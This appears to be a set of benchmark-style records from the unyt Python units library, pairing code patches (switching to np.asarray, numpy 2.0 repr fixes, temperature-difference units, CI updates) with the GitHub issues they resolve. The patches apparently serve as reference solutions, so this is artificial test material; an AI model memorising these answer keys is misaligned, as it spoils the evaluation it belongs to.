- [_.view(np.ndarray) for _ in arrays], axis=axis, out=out.view(np.ndarray)
+ [np.asarray(_) for _ in arrays], axis=axis, out=np.asarray(out)
)
if getattr(out, "units", None) is not None:
out.units = ret_units
@@ -347,11 +337,9 @@ def stack(arrays, /, axis=0, out=None):
def around(a, decimals=0, out=None):
ret_units = a.units
if out is None:
- return (
- np.around._implementation(a.view(np.ndarray), decimals=decimals) * ret_units
- )
+ return np.around._implementation(np.asarray(a), decimals=decimals) * ret_units
res = np.around._implementation(
- a.view(np.ndarray), decimals=decimals, out=out.view(np.ndarray)
+ np.asarray(a), decimals=decimals, out=np.asarray(out)
)
if getattr(out, "units", None) is not None:
out.units = ret_units
@@ -366,91 +354,87 @@ def block(arrays):
@implements(np.fft.fft)
def ftt_fft(a, *args, **kwargs):
- return np.fft.fft._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.fft._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.fft2)
def ftt_fft2(a, *args, **kwargs):
- return np.fft.fft2._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.fft2._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.fftn)
def ftt_fftn(a, *args, **kwargs):
- return np.fft.fftn._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.fftn._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.hfft)
def ftt_hfft(a, *args, **kwargs):
- return np.fft.hfft._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.hfft._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.rfft)
def ftt_rfft(a, *args, **kwargs):
- return np.fft.rfft._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.rfft._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.rfft2)
def ftt_rfft2(a, *args, **kwargs):
- return np.fft.rfft2._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.rfft2._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.rfftn)
def ftt_rfftn(a, *args, **kwargs):
- return np.fft.rfftn._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.rfftn._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.ifft)
def ftt_ifft(a, *args, **kwargs):
- return np.fft.ifft._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.ifft._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.ifft2)
def ftt_ifft2(a, *args, **kwargs):
- return np.fft.ifft2._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.ifft2._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.ifftn)
def ftt_ifftn(a, *args, **kwargs):
- return np.fft.ifftn._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.ifftn._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.ihfft)
def ftt_ihfft(a, *args, **kwargs):
- return np.fft.ihfft._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.ihfft._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.irfft)
def ftt_irfft(a, *args, **kwargs):
- return np.fft.irfft._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.irfft._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.irfft2)
def ftt_irfft2(a, *args, **kwargs):
- return np.fft.irfft2._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.irfft2._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.irfftn)
def ftt_irfftn(a, *args, **kwargs):
- return np.fft.irfftn._implementation(a.view(np.ndarray), *args, **kwargs) / a.units
+ return np.fft.irfftn._implementation(np.asarray(a), *args, **kwargs) / a.units
@implements(np.fft.fftshift)
def fft_fftshift(x, *args, **kwargs):
- return (
- np.fft.fftshift._implementation(x.view(np.ndarray), *args, **kwargs) * x.units
- )
+ return np.fft.fftshift._implementation(np.asarray(x), *args, **kwargs) * x.units
@implements(np.fft.ifftshift)
def fft_ifftshift(x, *args, **kwargs):
- return (
- np.fft.ifftshift._implementation(x.view(np.ndarray), *args, **kwargs) * x.units
- )
+ return np.fft.ifftshift._implementation(np.asarray(x), *args, **kwargs) * x.units
@implements(np.sort_complex)
def sort_complex(a):
- return np.sort_complex._implementation(a.view(np.ndarray)) * a.units
+ return np.sort_complex._implementation(np.asarray(a)) * a.units
def _array_comp_helper(a, b):
@@ -469,17 +453,13 @@ def _array_comp_helper(a, b):
@implements(np.isclose)
def isclose(a, b, *args, **kwargs):
a, b = _array_comp_helper(a, b)
- return np.isclose._implementation(
- a.view(np.ndarray), b.view(np.ndarray), *args, **kwargs
- )
+ return np.isclose._implementation(np.asarray(a), np.asarray(b), *args, **kwargs)
@implements(np.allclose)
def allclose(a, b, *args, **kwargs):
a, b = _array_comp_helper(a, b)
- return np.allclose._implementation(
- a.view(np.ndarray), b.view(np.ndarray), *args, **kwargs
- )
+ return np.allclose._implementation(np.asarray(a), np.asarray(b), *args, **kwargs)
@implements(np.array_equal)
@@ -490,7 +470,7 @@ def array_equal(a1, a2, *args, **kwargs) -> bool:
return False
return np.array_equal._implementation(
- a1.view(np.ndarray), a2.view(np.ndarray), *args, **kwargs
+ np.asarray(a1), np.asarray(a2), *args, **kwargs
)
@@ -502,7 +482,7 @@ def array_equiv(a1, a2, *args, **kwargs) -> bool:
return False
return np.array_equiv._implementation(
- a1.view(np.ndarray), a2.view(np.ndarray), *args, **kwargs
+ np.asarray(a1), np.asarray(a2), *args, **kwargs
)
@@ -511,7 +491,7 @@ def linspace(start, stop, *args, **kwargs):
_validate_units_consistency((start, stop))
return (
np.linspace._implementation(
- start.view(np.ndarray), stop.view(np.ndarray), *args, **kwargs
+ np.asarray(start), np.asarray(stop), *args, **kwargs
)
* start.units
)
@@ -522,7 +502,7 @@ def logspace(start, stop, *args, **kwargs):
_validate_units_consistency((start, stop))
return (
np.logspace._implementation(
- start.view(np.ndarray), stop.view(np.ndarray), *args, **kwargs
+ np.asarray(start), np.asarray(stop), *args, **kwargs
)
* start.units
)
@@ -533,7 +513,7 @@ def geomspace(start, stop, *args, **kwargs):
_validate_units_consistency((start, stop))
return (
np.geomspace._implementation(
- start.view(np.ndarray), stop.view(np.ndarray), *args, **kwargs
+ np.asarray(start), np.asarray(stop), *args, **kwargs
)
* start.units
)
@@ -551,54 +531,50 @@ def copyto(dst, src, *args, **kwargs):
@implements(np.prod)
def prod(a, *args, **kwargs):
- return (
- np.prod._implementation(a.view(np.ndarray), *args, **kwargs) * a.units**a.size
- )
+ return np.prod._implementation(np.asarray(a), *args, **kwargs) * a.units**a.size
@implements(np.var)
def var(a, *args, **kwargs):
- return np.var._implementation(a.view(np.ndarray), *args, **kwargs) * a.units**2
+ return np.var._implementation(np.asarray(a), *args, **kwargs) * a.units**2
@implements(np.trace)
def trace(a, *args, **kwargs):
- return np.trace._implementation(a.view(np.ndarray), *args, **kwargs) * a.units
+ return np.trace._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.percentile)
def percentile(a, *args, **kwargs):
- return np.percentile._implementation(a.view(np.ndarray), *args, **kwargs) * a.units
+ return np.percentile._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.quantile)
def quantile(a, *args, **kwargs):
- return np.quantile._implementation(a.view(np.ndarray), *args, **kwargs) * a.units
+ return np.quantile._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.nanpercentile)
def nanpercentile(a, *args, **kwargs):
- return (
- np.nanpercentile._implementation(a.view(np.ndarray), *args, **kwargs) * a.units
- )
+ return np.nanpercentile._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.nanquantile)
def nanquantile(a, *args, **kwargs):
- return np.nanquantile._implementation(a.view(np.ndarray), *args, **kwargs) * a.units
+ return np.nanquantile._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.linalg.det)
def linalg_det(a, *args, **kwargs):
- return np.linalg.det._implementation(
- a.view(np.ndarray), *args, **kwargs
- ) * a.units ** (a.shape[0])
+ return np.linalg.det._implementation(np.asarray(a), *args, **kwargs) * a.units ** (
+ a.shape[0]
+ )
@implements(np.linalg.lstsq)
def linalg_lstsq(a, b, *args, **kwargs):
x, residuals, rank, s = np.linalg.lstsq._implementation(
- a.view(np.ndarray), b.view(np.ndarray), *args, **kwargs
+ np.asarray(a), np.asarray(b), *args, **kwargs
)
au = getattr(a, "units", NULL_UNIT)
bu = getattr(b, "units", NULL_UNIT)
@@ -610,9 +586,7 @@ def linalg_solve(a, b, *args, **kwargs):
au = getattr(a, "units", NULL_UNIT)
bu = getattr(b, "units", NULL_UNIT)
return (
- np.linalg.solve._implementation(
- a.view(np.ndarray), b.view(np.ndarray), *args, **kwargs
- )
+ np.linalg.solve._implementation(np.asarray(a), np.asarray(b), *args, **kwargs)
* bu
/ au
)
@@ -624,7 +598,7 @@ def linalg_tensorsolve(a, b, *args, **kwargs):
bu = getattr(b, "units", NULL_UNIT)
return (
np.linalg.tensorsolve._implementation(
- a.view(np.ndarray), b.view(np.ndarray), *args, **kwargs
+ np.asarray(a), np.asarray(b), *args, **kwargs
)
* bu
/ au
@@ -634,30 +608,25 @@ def linalg_tensorsolve(a, b, *args, **kwargs):
@implements(np.linalg.eig)
def linalg_eig(a, *args, **kwargs):
ret_units = a.units
- w, v = np.linalg.eig._implementation(a.view(np.ndarray), *args, **kwargs)
+ w, v = np.linalg.eig._implementation(np.asarray(a), *args, **kwargs)
return w * ret_units, v
@implements(np.linalg.eigh)
def linalg_eigh(a, *args, **kwargs):
ret_units = a.units
- w, v = np.linalg.eigh._implementation(a.view(np.ndarray), *args, **kwargs)
+ w, v = np.linalg.eigh._implementation(np.asarray(a), *args, **kwargs)
return w * ret_units, v
@implements(np.linalg.eigvals)
def linalg_eigvals(a, *args, **kwargs):
- return (
- np.linalg.eigvals._implementation(a.view(np.ndarray), *args, **kwargs) * a.units
- )
+ return np.linalg.eigvals._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.linalg.eigvalsh)
def linalg_eigvalsh(a, *args, **kwargs):
- return (
- np.linalg.eigvalsh._implementation(a.view(np.ndarray), *args, **kwargs)
- * a.units
- )
+ return np.linalg.eigvalsh._implementation(np.asarray(a), *args, **kwargs) * a.units
@implements(np.savetxt)
@@ -671,12 +640,12 @@ def savetxt(fname, X, *args, **kwargs):
"(and `unyt.loadtxt`) instead.",
stacklevel=4,
)
- return np.savetxt._implementation(fname, X.view(np.ndarray), *args, **kwargs)
+ return np.savetxt._implementation(fname, np.asarray(X), *args, **kwargs)
@implements(np.apply_over_axes)
def apply_over_axes(func, a, axes):
- res = func(a.view(np.ndarray), axes[0]) * a.units
+ res = func(np.asarray(a), axes[0]) * a.units
if len(axes) > 1:
# this function is recursive by nature,
# here we intentionally do not call the base _implementation
@@ -696,7 +665,7 @@ def diff_helper(func, arr, *args, **kwargs):
ret_units = delta_degC
else:
ret_units = u
- return func._implementation(arr.view(np.ndarray), *args, **kwargs) * ret_units
+ return func._implementation(np.asarray(arr), *args, **kwargs) * ret_units
@implements(np.diff)
@@ -725,7 +694,7 @@ def cumprod(a, *args, **kwargs):
@implements(np.pad)
def pad(array, *args, **kwargs):
- return np.pad._implementation(array.view(np.ndarray), *args, **kwargs) * array.units
+ return np.pad._implementation(np.asarray(array), *args, **kwargs) * array.units
@implements(np.choose)
@@ -748,7 +717,7 @@ def choose(a, choices, out=None, *args, **kwargs):
a,
[np.asarray(c) for c in choices],
*args,
- out=out.view(np.ndarray),
+ out=np.asarray(out),
**kwargs,
)
if getattr(out, "units", None) is not None:
@@ -759,7 +728,7 @@ def choose(a, choices, out=None, *args, **kwargs):
@implements(np.fill_diagonal)
def fill_diagonal(a, val, *args, **kwargs) -> None:
_validate_units_consistency_v2(a.units, val)
- np.fill_diagonal._implementation(a.view(np.ndarray), val, *args, **kwargs)
+ np.fill_diagonal._implementation(np.asarray(a), val, *args, **kwargs)
@implements(np.insert)
@@ -767,7 +736,7 @@ def insert(arr, obj, values, *args, **kwargs):
_validate_units_consistency_v2(arr.units, values)
return (
np.insert._implementation(
- arr.view(np.ndarray), obj, np.asarray(values), *args, **kwargs
+ np.asarray(arr), obj, np.asarray(values), *args, **kwargs
)
* arr.units
)
@@ -784,38 +753,34 @@ def isin(element, test_elements, *args, **kwargs):
@implements(np.place)
def place(arr, mask, vals, *args, **kwargs) -> None:
_validate_units_consistency_v2(arr.units, vals)
- np.place._implementation(
- arr.view(np.ndarray), mask, vals.view(np.ndarray), *args, **kwargs
- )
+ np.place._implementation(np.asarray(arr), mask, np.asarray(vals), *args, **kwargs)
@implements(np.put)
def put(a, ind, v, *args, **kwargs) -> None:
_validate_units_consistency_v2(a.units, v)
- np.put._implementation(a.view(np.ndarray), ind, v.view(np.ndarray))
+ np.put._implementation(np.asarray(a), ind, np.asarray(v))
@implements(np.put_along_axis)
def put_along_axis(arr, indices, values, axis, *args, **kwargs) -> None:
_validate_units_consistency_v2(arr.units, values)
np.put_along_axis._implementation(
- arr.view(np.ndarray), indices, np.asarray(values), axis, *args, **kwargs
+ np.asarray(arr), indices, np.asarray(values), axis, *args, **kwargs
)
@implements(np.putmask)
def putmask(a, mask, values, *args, **kwargs) -> None:
_validate_units_consistency_v2(a.units, values)
- np.putmask._implementation(
- a.view(np.ndarray), mask, np.asarray(values), *args, **kwargs
- )
+ np.putmask._implementation(np.asarray(a), mask, np.asarray(values), *args, **kwargs)
@implements(np.searchsorted)
def searchsorted(a, v, *args, **kwargs):
_validate_units_consistency_v2(a.units, v)
return np.searchsorted._implementation(
- a.view(np.ndarray), np.asarray(v), *args, **kwargs
+ np.asarray(a), np.asarray(v), *args, **kwargs
)
@@ -844,7 +809,7 @@ def setdiff1d(ar1, ar2, *args, **kwargs):
def sinc(x, *args, **kwargs):
# this implementation becomes necessary after implementing where
# we *want* this one to ignore units
- return np.sinc._implementation(x.view(np.ndarray), *args, **kwargs)
+ return np.sinc._implementation(np.asarray(x), *args, **kwargs)
@implements(np.clip)
@@ -864,7 +829,7 @@ def clip(a, a_min, a_max, out=None, *args, **kwargs):
np.asarray(a_min),
np.asarray(a_max),
*args,
- out=out.view(np.ndarray),
+ out=np.asarray(out),
**kwargs,
)
* a.units
@@ -877,7 +842,7 @@ def clip(a, a_min, a_max, out=None, *args, **kwargs):
@implements(np.where)
def where(condition, *args, **kwargs):
if len(args) == 0:
- return np.where._implementation(condition.view(np.ndarray), **kwargs)
+ return np.where._implementation(np.asarray(condition), **kwargs)
elif len(args) < 2:
# error message borrowed from numpy 1.24.1
@@ -909,7 +874,7 @@ def einsum(subscripts, *operands, out=None, **kwargs):
ret_units = _validate_units_consistency(operands)
if out is not None:
- out_view = out.view(np.ndarray)
+ out_view = np.asarray(out)
else:
out_view = out
@@ -930,9 +895,7 @@ def einsum(subscripts, *operands, out=None, **kwargs):
def convolve(a, v, *args, **kwargs):
ret_units = np.prod(get_units((a, v)))
return (
- np.convolve._implementation(
- a.view(np.ndarray), v.view(np.ndarray), *args, **kwargs
- )
+ np.convolve._implementation(np.asarray(a), np.asarray(v), *args, **kwargs)
* ret_units
)
@@ -941,9 +904,7 @@ def convolve(a, v, *args, **kwargs):
def correlate(a, v, *args, **kwargs):
ret_units = np.prod(get_units((a, v)))
return (
- np.correlate._implementation(
- a.view(np.ndarray), v.view(np.ndarray), *args, **kwargs
- )
+ np.correlate._implementation(np.asarray(a), np.asarray(v), *args, **kwargs)
* ret_units
)
@@ -952,9 +913,7 @@ def correlate(a, v, *args, **kwargs):
def tensordot(a, b, *args, **kwargs):
ret_units = np.prod(get_units((a, b)))
return (
- np.tensordot._implementation(
- a.view(np.ndarray), b.view(np.ndarray), *args, **kwargs
- )
+ np.tensordot._implementation(np.asarray(a), np.asarray(b), *args, **kwargs)
* ret_units
)
@@ -962,7 +921,7 @@ def tensordot(a, b, *args, **kwargs):
@implements(np.unwrap)
def unwrap(p, *args, **kwargs):
ret_units = p.units
- return np.unwrap._implementation(p.view(np.ndarray), *args, **kwargs) * ret_units
+ return np.unwrap._implementation(np.asarray(p), *args, **kwargs) * ret_units
@implements(np.interp)
@@ -982,7 +941,7 @@ def interp(x, xp, fp, *args, **kwargs):
@implements(np.array_repr)
def array_repr(arr, *args, **kwargs):
- rep = np.array_repr._implementation(arr.view(np.ndarray), *args, **kwargs)
+ rep = np.array_repr._implementation(np.asarray(arr), *args, **kwargs)
rep = rep.replace("array", arr.__class__.__name__)
units_repr = arr.units.__repr__()
if "=" in rep:
@@ -996,7 +955,7 @@ def array_repr(arr, *args, **kwargs):
@implements(np.asfarray)
def asfarray(a, dtype=np.double):
ret_units = a.units
- return np.asfarray._implementation(a.view(np.ndarray), dtype=dtype) * ret_units
+ return np.asfarray._implementation(np.asarray(a), dtype=dtype) * ret_units
# functions with pending deprecations
@@ -1010,12 +969,11 @@ def trapz(y, x=None, dx=1.0, *args, **kwargs):
else:
ret_units = ret_units * getattr(x, "units", NULL_UNIT)
if isinstance(x, np.ndarray):
- x = x.view(np.ndarray)
+ x = np.asarray(x)
if isinstance(dx, np.ndarray):
- dx = dx.view(np.ndarray)
+ dx = np.asarray(dx)
return (
- np.trapz._implementation(y.view(np.ndarray), x, dx, *args, **kwargs)
- * ret_units
+ np.trapz._implementation(np.asarray(y), x, dx, *args, **kwargs) * ret_units
)
| BUG: (NEP 18) spurious errors when mixing array-like with unyt_array with non-default registry
* unyt version: 3.0.0
* Python version: 3.9.17
* Operating System: any
### Description
array functions (NEP 18) are supposed to treat pure numpy arrays as dimensionless, but the way this treatment is implemented in unyt 3.0.0 isn't robust enough and it chokes when passed Python lists, or unyt_arrays that use a registry other than the default one.
### What I Did
The following 3 examples should produce similar results and certainly not raise errors
```python
import numpy as np
from unyt.unit_object import Unit
from unyt.unit_registry import UnitRegistry
# this is ok
np.concatenate([np.array([1]), [2]*Unit()])
# but this isn't
np.concatenate([[1], [2]*Unit()])
# and neither is this
np.concatenate([np.array([1]), [2]*Unit(registry=UnitRegistry())])
```
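A likely reason the second and third calls fail is that the wrapped implementations called `.view(np.ndarray)` on every operand, which plain Python lists don't support; the patch above switches to `np.asarray`, which accepts any array-like. A minimal sketch of the difference, using only plain NumPy (no unyt required):

```python
import numpy as np

data_list = [1, 2, 3]            # plain Python list: has no .view method
arr = np.array([1, 2, 3])

# ndarray.view only exists on ndarray (and its subclasses):
assert hasattr(arr, "view") and not hasattr(data_list, "view")

# np.asarray accepts any array-like, and is a no-copy
# pass-through for data that is already a plain ndarray:
converted = np.asarray(data_list)
passed_through = np.asarray(arr)
assert converted.tolist() == [1, 2, 3]
assert passed_through is arr
```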
| There are really two bugs in here, and I'll try to address them separately | 2023-11-02T09:14:39 | 0.0 | [] | [] |
||
yt-project/unyt | yt-project__unyt-434 | b0ff846eface70ef987a9f860ce089c2cdea29f9 | diff --git a/docs/usage.rst b/docs/usage.rst
index b7cb53c8..aabb3e72 100644
--- a/docs/usage.rst
+++ b/docs/usage.rst
@@ -959,14 +959,14 @@ bit floating point array.
>>> data = np.array([1, 2, 3], dtype='int32')*km
>>> data.in_units('mile')
- unyt_array([0.62137121, 1.24274242, 1.86411357], dtype=float32, units='mile')
+ unyt_array([0.6213712, 1.2427424, 1.8641136], dtype=float32, units='mile')
In-place operations will also mutate the dtype from float to integer in these
cases, again in a way that will preserve the byte size of the data.
>>> data.convert_to_units('mile')
>>> data
- unyt_array([0.62137121, 1.24274242, 1.86411357], dtype=float32, units='mile')
+ unyt_array([0.6213712, 1.2427424, 1.8641136], dtype=float32, units='mile')
It is possible that arrays containing large integers (16777217 for 32 bit and
9007199254740993 for 64 bit) will lose precision when converting data to a
diff --git a/unyt/_array_functions.py b/unyt/_array_functions.py
index 57a22e62..ccb87bf1 100644
--- a/unyt/_array_functions.py
+++ b/unyt/_array_functions.py
@@ -995,3 +995,14 @@ def interp(x, xp, fp, *args, **kwargs):
np.interp(np.asarray(x), np.asarray(xp), np.asarray(fp), *args, **kwargs)
* ret_units
)
+
+
+@implements(np.array_repr)
+def array_repr(arr, *args, **kwargs):
+ rep = np.array_repr._implementation(arr.view(np.ndarray), *args, **kwargs)
+ rep = rep.replace("array", arr.__class__.__name__)
+ units_repr = arr.units.__repr__()
+ if "=" in rep:
+ return rep[:-1] + ", units='" + units_repr + "')"
+ else:
+ return rep[:-1] + ", '" + units_repr + "')"
diff --git a/unyt/array.py b/unyt/array.py
index ef06fb41..367ed145 100644
--- a/unyt/array.py
+++ b/unyt/array.py
@@ -636,12 +636,7 @@ def __new__(
return obj
def __repr__(self):
- rep = super().__repr__()
- units_repr = self.units.__repr__()
- if "=" in rep:
- return rep[:-1] + ", units='" + units_repr + "')"
- else:
- return rep[:-1] + ", '" + units_repr + "')"
+ return np.array_repr(self)
def __str__(self):
return str(self.view(np.ndarray)) + " " + str(self.units)
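The fix routes `__repr__` through `np.array_repr`, which unyt now overrides via its NEP 18 `implements` registry. A self-contained sketch of that dispatch pattern (the `Tagged` subclass and `HANDLED` registry here are illustrative, not unyt's actual classes):

```python
import numpy as np

HANDLED = {}

def implements(numpy_function):
    """Register a custom override for a NumPy function (NEP 18 style)."""
    def decorator(func):
        HANDLED[numpy_function] = func
        return func
    return decorator

class Tagged(np.ndarray):
    def __array_function__(self, func, types, args, kwargs):
        if func in HANDLED:                      # use our override if registered
            return HANDLED[func](*args, **kwargs)
        return super().__array_function__(func, types, args, kwargs)

@implements(np.array_repr)
def tagged_repr(arr, *args, **kwargs):
    # np.asarray drops the subclass, so this inner call is not re-dispatched
    rep = np.array_repr(np.asarray(arr), *args, **kwargs)
    return rep.replace("array", type(arr).__name__)

t = np.array([1, 2]).view(Tagged)
assert np.array_repr(t).startswith("Tagged(")
```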
| BUG: future incompatibility with numpy 2.0
Some repr test is broken against numpy 2.0 (dev), see https://github.com/yt-project/unyt/actions/runs/5745024731
| 2023-08-03T09:33:15 | 0.0 | [] | [] |
|||
yt-project/unyt | yt-project__unyt-430 | 80653c20f7f3d72660b683f46fb1670c5fa17d87 | diff --git a/.github/workflows/bleeding-edge.yaml b/.github/workflows/bleeding-edge.yaml
index 54cf0bec..83dec0a9 100644
--- a/.github/workflows/bleeding-edge.yaml
+++ b/.github/workflows/bleeding-edge.yaml
@@ -39,15 +39,15 @@ jobs:
- name: Install dependencies
run: |
- python3 -m pip install --upgrade pip
- python3 -m pip install --upgrade setuptools wheel setuptools_scm
- python3 -m pip install git+https://github.com/numpy/numpy.git
- python3 -m pip install git+https://github.com/matplotlib/matplotlib.git
- python3 -m pip install pytest
- python3 -m pip install --pre sympy
+ python -m pip install --upgrade pip
+ python -m pip install --upgrade setuptools wheel setuptools_scm
+ python -m pip install --pre --extra-index \
+ https://pypi.anaconda.org/scientific-python-nightly-wheels/simple numpy matplotlib
+ python -m pip install pytest
+ python -m pip install --pre sympy
- name: Build unyt
- run: python3 -m pip install --no-build-isolation .
+ run: python -m pip install --no-build-isolation .
- name: Run Tests
run: pytest -vvv unyt/
| 3 new wrappable functions (NEP 18)
### Description
bleeding-edge CI is currently failing because numpy has 3 new wrappable functions
- `np.byte_bounts`
- `np.who`
- `np.safe_eval` (unreleased ?)
The first two are probably good left unwrapped, but `np.safe_eval` isn't documented yet (probably new in numpy dev). I'll dig further in later.
| actually I see now that all three functions were recently marked as deprecated in numpy dev. I assume they are now detected as wrappable as a side effect of this change. The immediate fix is just to ignore them, but long term it would be better to automatically filter out deprecated functions assuming it's possible. | 2023-06-21T08:49:46 | 0.0 | [] | [] |
||
yt-project/unyt | yt-project__unyt-413 | 6acbb4bd3291095d8568282bf29f6f6aab1e84e8 | diff --git a/tox.ini b/tox.ini
index 8d428416..f220e14b 100644
--- a/tox.ini
+++ b/tox.ini
@@ -21,7 +21,7 @@ deps =
pint
astropy
coverage[toml]>=5.0
- packaging>=20.9,
+ packaging>=20.9
pytest-cov
pytest-doctestplus
matplotlib!=3.5.0
diff --git a/unyt/array.py b/unyt/array.py
index 517dae0e..ef06fb41 100644
--- a/unyt/array.py
+++ b/unyt/array.py
@@ -127,6 +127,7 @@
_sanitize_unit_system,
default_unit_registry,
)
+from unyt.unit_symbols import delta_degC, delta_degF
from ._deprecation import warn_deprecated
@@ -194,6 +195,42 @@ def _preserve_units(unit1, unit2=None):
return 1, unit1
+@lru_cache(maxsize=128, typed=False)
+def _difference_units(unit1, unit2=None):
+ if unit1.dimensions is not temperature:
+ return _preserve_units(unit1, unit2)
+
+ s1 = repr(unit1)
+ if unit2 is not None and unit2 != unit1:
+ s2 = repr(unit2)
+ if s1 in s2 and s2.startswith("delta_"):
+ return 1, unit1
+ elif s2 in s1 and s1.startswith("delta_"):
+ return 1, unit2
+ else:
+ raise InvalidUnitOperation(
+ "Quantities with units of Fahrenheit or Celsius "
+ "cannot be multiplied, divided, subtracted or "
+ "added with data that has different units."
+ )
+
+ if unit1.base_offset == 0.0:
+ return 1, unit1
+
+ if s1 == "degF":
+ return 1, delta_degF
+ elif s1 == "degC":
+ return 1, delta_degC
+ else:
+ # This is supposed to be unreachable
+ raise RuntimeError(
+ "Could not determine difference temperature units "
+ f"in operation ({unit1} - {unit2}).\n"
+ "If you see this error please file an issue at "
+ "https://github.com/yt-project/unyt/issues/new"
+ )
+
+
@lru_cache(maxsize=128, typed=False)
def _power_unit(unit, power):
return 1, unit**power
@@ -444,7 +481,7 @@ class unyt_array(np.ndarray):
_ufunc_registry = {
add: _preserve_units,
- subtract: _preserve_units,
+ subtract: _difference_units,
multiply: _multiply_units,
divide: _divide_units,
logaddexp: _return_without_unit,
@@ -1834,7 +1871,12 @@ def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):
):
raise UnitOperationError(ufunc, u0, u1)
- if unit_operator in (_preserve_units, _comparison_unit, _arctan2_unit):
+ if unit_operator in (
+ _preserve_units,
+ _comparison_unit,
+ _arctan2_unit,
+ _difference_units,
+ ):
# check "is" equality first for speed
if u0 is not u1 and u0 != u1:
# we allow adding, multiplying, comparisons with
| Subtracting temperatures gives degC rather than delta_degC
* unyt version:
'v2.8.0'
* Python version:
3.8.12
* Operating System:
Mac
### Description
Working with change in temperature. I would expect a difference between two temperatures to return a delta_degC rather than a degC.
### What I Did
Actual
```
>>> import unyt as u
>>> delta = 2 * u.degC - 1 * u.degC
>>> delta
unyt_quantity(1, 'degC')
>>> delta.to('K')
unyt_quantity(274.15, 'K')
```
Expected
```
>>> import unyt as u
>>> delta = 2 * u.degC - 1 * u.degC
>>> delta
unyt_quantity(1, 'delta_degC')
>>> delta.to('K')
unyt_quantity(1, 'K')
```
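The expected result follows from how affine (offset) units behave under subtraction: degC to K is `K = degC + 273.15`, so the constant offset cancels in any difference, leaving a pure delta. A plain-Python sketch of that cancellation (no unyt needed):

```python
# degC -> K conversion is affine: same scale, constant offset.
OFFSET = 273.15

def celsius_to_kelvin(deg_c):
    return deg_c + OFFSET

t_hi, t_lo = 2.0, 1.0
delta_in_kelvin = celsius_to_kelvin(t_hi) - celsius_to_kelvin(t_lo)

# The offsets cancel, so a temperature *difference* of 1 degC
# is 1 K -- not 274.15 K.
assert abs(delta_in_kelvin - (t_hi - t_lo)) < 1e-9
```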
| I agree that this feature is desirable. I'll think about how this could be implemented.
There is a workaround:
```python
In [1]: from unyt import degC, delta_degC
In [2]: dt = 20*degC - 10*degC
In [3]: dt
Out[3]: unyt_quantity(10, 'degC')
In [4]: dt.units = delta_degC
In [5]: dt
Out[5]: unyt_quantity(10, 'delta_degC')
```
Other technical computing systems such as Mathcad Prime and Matlab also have this trouble with temperature subtraction (screenshot omitted).
Sorry for not following up on this as I said I would.
I'm inclined to see this as a bug actually, though it might (or might not) be tricky to fix.
Furthermore I note that on the main branch (future unyt 3.0), `np.diff` behaves as we expect here
```python
>>> from unyt import K
>>> import numpy as np
>>> np.diff([1, 2, 3]*K)
unyt_array([1, 1], 'delta_degC')
```
But manual differences don't
```python
>>> 2*K - 1*K
unyt_quantity(1, 'K')
``` | 2023-04-10T22:08:21 | 0.0 | [] | [] |
||
yt-project/unyt | yt-project__unyt-412 | be4791b130988b7e433470e6c30b46266096d014 | diff --git a/unyt/_array_functions.py b/unyt/_array_functions.py
index b40642b6..57a22e62 100644
--- a/unyt/_array_functions.py
+++ b/unyt/_array_functions.py
@@ -8,7 +8,6 @@
from unyt.dimensions import temperature
from unyt.exceptions import (
InvalidUnitOperation,
- UnitConversionError,
UnitInconsistencyError,
UnytError,
)
@@ -469,10 +468,7 @@ def _array_comp_helper(a, b):
au = getattr(a, "units", NULL_UNIT)
bu = getattr(b, "units", NULL_UNIT)
if bu != au and au != NULL_UNIT and bu != NULL_UNIT:
- if (bu / au).is_dimensionless:
- b = np.array(b) * (1 * bu).to(au)
- else:
- raise UnitConversionError(au, au.dimensions, bu, bu.dimensions)
+ b = b.in_units(au)
elif bu == NULL_UNIT:
b = np.array(b) * au
elif au == NULL_UNIT:
| BUG: temperature units comparison
* unyt version: 2.9.5
### Description
I would not expect Kelvin and degree Celsius to compare equal, yet this is the current result of `Unit.__eq__`
### What I Did
```python
import unyt as un
assert un.K != un.degC
```
raises `AssertionError`
Note that on the main branch (unyt 3.0, using NEP 18), this is breaking array comparison
```python
import numpy as np
import unyt as un
assert all(np.isclose([1, 2, 3] * un.K, [-272.15, -271.15, -270.15] * un.degC))
```
I think the correct solution is to include `Unit.base_offset` in the comparison routine, but I'm not 100% certain.
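The array case illustrates why value conversion, not just dimension checking, is needed: 1 K and -272.15 degC are the same physical temperature only after applying the offset. A unyt-free sketch of an offset-aware comparison:

```python
import numpy as np

# Affine conversion: kelvin = celsius + 273.15
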